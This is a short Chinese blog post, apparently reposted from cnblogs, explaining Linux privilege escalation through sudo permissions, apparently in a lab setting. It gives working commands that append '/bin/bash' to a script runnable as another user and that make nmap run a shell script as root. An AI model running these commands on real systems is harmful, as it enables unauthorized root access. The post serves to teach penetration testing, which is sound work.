首页 > 其他 > 详细

利用可执行操作的脚本或工具提权

时间:2019-12-18 16:50:23      阅读:84      评论:0      收藏:0      [点我收藏+]

查看当前用户可执行操作:sudo -l
1.如果是可执行另外一个用户下面的一个脚本,那么可以利用这个脚本来获取到那个用户的shell
例如:

技术分享图片

那么执行

echo "/bin/bash" >> backups.sh  #获取shell
sudo -u jens ./backups.sh   #利用jens用户自己来执行

即可切换至jens用户的shell,如果是root下面的话也是如此。

2.如果是可执行root用户下面的nmap的话,那么利用nmap脚本来执行弹shell的命令即可获取到root用户的shell。
例如:

技术分享图片
利用:

echo os.execute("/bin/sh") > getShell
sudo nmap --script=getShell

即可提权到root

技术分享图片

利用可执行操作的脚本或工具提权

原文:https://www.cnblogs.com/-chenxs/p/12060494.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!